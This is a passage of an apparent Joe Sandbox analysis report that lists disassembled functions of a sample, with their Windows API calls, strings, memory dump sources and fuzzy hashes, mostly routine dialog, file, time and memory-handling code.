                                                                                                                                  Function 008BD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 008BD6C1
                                                                                                                                  • GetClassNameW.USER32(00000000,?,00000800), ref: 008BD6ED
                                                                                                                                    • Part of subcall function 008B1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,008AC116,00000000,.exe,?,?,00000800,?,?,?,008B8E3C), ref: 008B1FD1
                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 008BD709
                                                                                                                                  • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 008BD720
                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 008BD734
                                                                                                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 008BD75D
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 008BD764
                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 008BD76D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                                  • String ID: STATIC
                                                                                                                                  • API String ID: 3820355801-1882779555
                                                                                                                                  • Opcode ID: 0c7fab8f6cccb66ea08dd0a1517955bf263b90a118acf920f6b220891f87c668
                                                                                                                                  • Instruction ID: e02e327f0ba0ad287936e7343580510558f78adfdd32a52285d6c7dedfe09630
                                                                                                                                  • Opcode Fuzzy Hash: 0c7fab8f6cccb66ea08dd0a1517955bf263b90a118acf920f6b220891f87c668
                                                                                                                                  • Instruction Fuzzy Hash: DD1136721093107FE2306B749C4AFEF766CFF14701F00C121FA11E2292EE64CB0556AA
                                                                                                                                  Function 008C96F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 008C9705
                                                                                                                                    • Part of subcall function 008C8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008CC896,?,00000000,?,00000000,?,008CC8BD,?,00000007,?,?,008CCCBA,?), ref: 008C8DE2
                                                                                                                                    • Part of subcall function 008C8DCC: GetLastError.KERNEL32(?,?,008CC896,?,00000000,?,00000000,?,008CC8BD,?,00000007,?,?,008CCCBA,?,?), ref: 008C8DF4
                                                                                                                                  • _free.LIBCMT ref: 008C9711
                                                                                                                                  • _free.LIBCMT ref: 008C971C
                                                                                                                                  • _free.LIBCMT ref: 008C9727
                                                                                                                                  • _free.LIBCMT ref: 008C9732
                                                                                                                                  • _free.LIBCMT ref: 008C973D
                                                                                                                                  • _free.LIBCMT ref: 008C9748
                                                                                                                                  • _free.LIBCMT ref: 008C9753
                                                                                                                                  • _free.LIBCMT ref: 008C975E
                                                                                                                                  • _free.LIBCMT ref: 008C976C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 1b6836bad02406da2e2a0a91f9cb33c36ea1ecf65d1e6fbd80c6895521da9349
                                                                                                                                  • Instruction ID: ad16cf3550b47d2ebaf963a9856e791c0a1e37f724ffe7bedcc53cc27c88159b
                                                                                                                                  • Opcode Fuzzy Hash: 1b6836bad02406da2e2a0a91f9cb33c36ea1ecf65d1e6fbd80c6895521da9349
                                                                                                                                  • Instruction Fuzzy Hash: D111C376140009EFCB01EF98D842ED93BB5FF14390B0251A9FB098F262DE32DA509B85
                                                                                                                                  Function 008C2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                  • API String ID: 322700389-393685449
                                                                                                                                  • Opcode ID: 32d27c58ca49faafd90d4391e072443917a352fdb1738d03da5446dda15b0386
                                                                                                                                  • Instruction ID: 431ff77a863ba3213e2ba1a338c99ec83171536b0a300f91d5f5449e6f98fa72
                                                                                                                                  • Opcode Fuzzy Hash: 32d27c58ca49faafd90d4391e072443917a352fdb1738d03da5446dda15b0386
                                                                                                                                  • Instruction Fuzzy Hash: E1B11471800219AFCF25DFA8D881EAEBBB5FF14310F14815EF815AB252D735DA52CB92
                                                                                                                                  Function 008A6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008A6FAA
                                                                                                                                  • _wcslen.LIBCMT ref: 008A7013
                                                                                                                                  • _wcslen.LIBCMT ref: 008A7084
                                                                                                                                    • Part of subcall function 008A7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 008A7AAB
                                                                                                                                    • Part of subcall function 008A7A9C: GetLastError.KERNEL32 ref: 008A7AF1
                                                                                                                                    • Part of subcall function 008A7A9C: CloseHandle.KERNEL32(?), ref: 008A7B00
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                  • API String ID: 3122303884-3508440684
                                                                                                                                  • Opcode ID: bf39c88642e3b71ecf6eda9d797bc5c79a82ab56849099d8bf3c9bd65db66282
                                                                                                                                  • Instruction ID: 540b01b2d03489ade952f51139ca6f5c8c72e7b13dc14f1f16317fca850eb8bb
                                                                                                                                  • Opcode Fuzzy Hash: bf39c88642e3b71ecf6eda9d797bc5c79a82ab56849099d8bf3c9bd65db66282
                                                                                                                                  • Instruction Fuzzy Hash: B141E9B1D0474479FF20D7749C45FDE776CFF16304F000455F955E6A82D674AA449722
                                                                                                                                  Function 008BB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008A1316: GetDlgItem.USER32(00000000,00003021), ref: 008A135A
                                                                                                                                    • Part of subcall function 008A1316: SetWindowTextW.USER32(00000000,008D35F4), ref: 008A1370
                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 008BB610
                                                                                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 008BB637
                                                                                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 008BB650
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 008BB661
                                                                                                                                  • GetDlgItem.USER32(?,00000065), ref: 008BB66A
                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 008BB67E
                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 008BB694
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                                  • String ID: LICENSEDLG
                                                                                                                                  • API String ID: 3214253823-2177901306
                                                                                                                                  • Opcode ID: 708474aca76f1e6d1433b776a57725832cda5232760184908262d270034513a2
                                                                                                                                  • Instruction ID: 85006c1238fc95a6dded8b885cb75c2651e3770b7da238580269b94e74b148f3
                                                                                                                                  • Opcode Fuzzy Hash: 708474aca76f1e6d1433b776a57725832cda5232760184908262d270034513a2
                                                                                                                                  • Instruction Fuzzy Hash: 8A21B431218218BFE6215B76EC49FBB3B7DFB5BB45F014014F601E66A1CBA29D01E635
                                                                                                                                  Function 008BFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,74B4297F,00000001,00000000,00000000,?,?,008AAF6C,ROOT\CIMV2), ref: 008BFD99
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,008AAF6C,ROOT\CIMV2), ref: 008BFE14
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 008BFE1F
                                                                                                                                  • _com_issue_error.COMSUPP ref: 008BFE48
                                                                                                                                  • _com_issue_error.COMSUPP ref: 008BFE52
                                                                                                                                  • GetLastError.KERNEL32(80070057,74B4297F,00000001,00000000,00000000,?,?,008AAF6C,ROOT\CIMV2), ref: 008BFE57
                                                                                                                                  • _com_issue_error.COMSUPP ref: 008BFE6A
                                                                                                                                  • GetLastError.KERNEL32(00000000,?,?,008AAF6C,ROOT\CIMV2), ref: 008BFE80
                                                                                                                                  • _com_issue_error.COMSUPP ref: 008BFE93
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1353541977-0
                                                                                                                                  • Opcode ID: 57efef1eb6f2de501814743e1a670fc387329432dddbded723c93edea8ca6ee3
                                                                                                                                  • Instruction ID: 22d778798db598af6576c060892b1a789cfea75f99227d2e0876c734bcbee829
                                                                                                                                  • Opcode Fuzzy Hash: 57efef1eb6f2de501814743e1a670fc387329432dddbded723c93edea8ca6ee3
                                                                                                                                  • Instruction Fuzzy Hash: B841B971A00219ABDB109F68DC45FEEBBA8FB44710F14823AFA15EB352D735D940C7A5
                                                                                                                                  Function 008AAF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog
                                                                                                                                  • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                                                  • API String ID: 3519838083-3505469590
                                                                                                                                  • Opcode ID: 37bf4296d5d54df1749f2556ea409b9364d0b1d283b210b8d3500dc4da07d365
                                                                                                                                  • Instruction ID: 0db050361a2ab8fd4e8efa6e94f8ca755c0d007815b1776e2388832e0b2d64e2
                                                                                                                                  • Opcode Fuzzy Hash: 37bf4296d5d54df1749f2556ea409b9364d0b1d283b210b8d3500dc4da07d365
                                                                                                                                  • Instruction Fuzzy Hash: 05716E71A00619AFEB18DFA4CC959AFB7B9FF49311B14026EE512E76A0CB30AD01CB51
                                                                                                                                  Function 008A9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008A9387
                                                                                                                                  • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 008A93AA
                                                                                                                                  • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 008A93C9
                                                                                                                                    • Part of subcall function 008AC29A: _wcslen.LIBCMT ref: 008AC2A2
                                                                                                                                    • Part of subcall function 008B1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,008AC116,00000000,.exe,?,?,00000800,?,?,?,008B8E3C), ref: 008B1FD1
                                                                                                                                  • _swprintf.LIBCMT ref: 008A9465
                                                                                                                                    • Part of subcall function 008A4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008A40A5
                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 008A94D4
                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 008A9514
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                                  • String ID: rtmp%d
                                                                                                                                  • API String ID: 3726343395-3303766350
                                                                                                                                  • Opcode ID: 3af561b74adcab9f690d4dc71e18ef0bef01d8ebe1f3a9094030a5e542747c3b
                                                                                                                                  • Instruction ID: 89eab8a3c67e9ce2d61e087926f63d1c032772bdca9f839679ff56b9fc9988c1
                                                                                                                                  • Opcode Fuzzy Hash: 3af561b74adcab9f690d4dc71e18ef0bef01d8ebe1f3a9094030a5e542747c3b
                                                                                                                                  • Instruction Fuzzy Hash: FD419371905258A6EF21ABA4CC45EEE737CFF46340F0048A5F689E3551EB388B89CB61
                                                                                                                                  Function 008B1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __aulldiv.LIBCMT ref: 008B122E
                                                                                                                                    • Part of subcall function 008AB146: GetVersionExW.KERNEL32(?), ref: 008AB16B
                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 008B1251
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 008B1263
                                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 008B1274
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 008B1284
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 008B1294
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 008B12CF
                                                                                                                                  • __aullrem.LIBCMT ref: 008B1379
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1247370737-0
                                                                                                                                  • Opcode ID: 95e31494a3bdcb0bff591a1e460710cf522c92e1217b050dec398f861093d13f
                                                                                                                                  • Instruction ID: d4e1ce33fde43778ada03853fc721909a73aed38bb2829821363d9e81ce96592
                                                                                                                                  • Opcode Fuzzy Hash: 95e31494a3bdcb0bff591a1e460710cf522c92e1217b050dec398f861093d13f
                                                                                                                                  • Instruction Fuzzy Hash: CA41E9B15083069FCB10DF65C8849ABBBF9FF88714F408A2EF596C6650E738E549CB52
                                                                                                                                  Function 008A2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _swprintf.LIBCMT ref: 008A2536
                                                                                                                                    • Part of subcall function 008A4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008A40A5
                                                                                                                                    • Part of subcall function 008B05DA: _wcslen.LIBCMT ref: 008B05E0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                                                  • String ID: ;%u$x%u$xc%u
                                                                                                                                  • API String ID: 3053425827-2277559157
                                                                                                                                  • Opcode ID: d59ac503183150865d8409cdfded6cde0db9d5a5112ea956a1a3ea8b35d26175
                                                                                                                                  • Instruction ID: 973269721e40c557aed86a843a5ea4be248fef80c89f203035428c985b57094d
                                                                                                                                  • Opcode Fuzzy Hash: d59ac503183150865d8409cdfded6cde0db9d5a5112ea956a1a3ea8b35d26175
                                                                                                                                  • Instruction Fuzzy Hash: 06F124706043409BEB35EB2C8495BEA7799FB92300F08457DFD86DBB83CB64894587A3
                                                                                                                                  Function 008B9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcslen
                                                                                                                                  • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                                  • API String ID: 176396367-3568243669
                                                                                                                                  • Opcode ID: 8beef3126a164791f9aea443ff133ca7e44b6f91e08dc029d5d1629dcaaeff27
                                                                                                                                  • Instruction ID: 6e05093cda48b2d5fb81c0af630773ae22eb63aa744eff292d798b2f71828594
                                                                                                                                  • Opcode Fuzzy Hash: 8beef3126a164791f9aea443ff133ca7e44b6f91e08dc029d5d1629dcaaeff27
                                                                                                                                  • Instruction Fuzzy Hash: 6E51F76674132295DB309A2A98217F673E0FFA1790F6D451AFBC1CB3C1FBA5CC818261
                                                                                                                                  Function 008CF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,008CFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 008CF6CF
                                                                                                                                  • __fassign.LIBCMT ref: 008CF74A
                                                                                                                                  • __fassign.LIBCMT ref: 008CF765
                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 008CF78B
                                                                                                                                  • WriteFile.KERNEL32(?,00000000,00000000,008CFE02,00000000,?,?,?,?,?,?,?,?,?,008CFE02,00000000), ref: 008CF7AA
                                                                                                                                  • WriteFile.KERNEL32(?,00000000,00000001,008CFE02,00000000,?,?,?,?,?,?,?,?,?,008CFE02,00000000), ref: 008CF7E3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1324828854-0
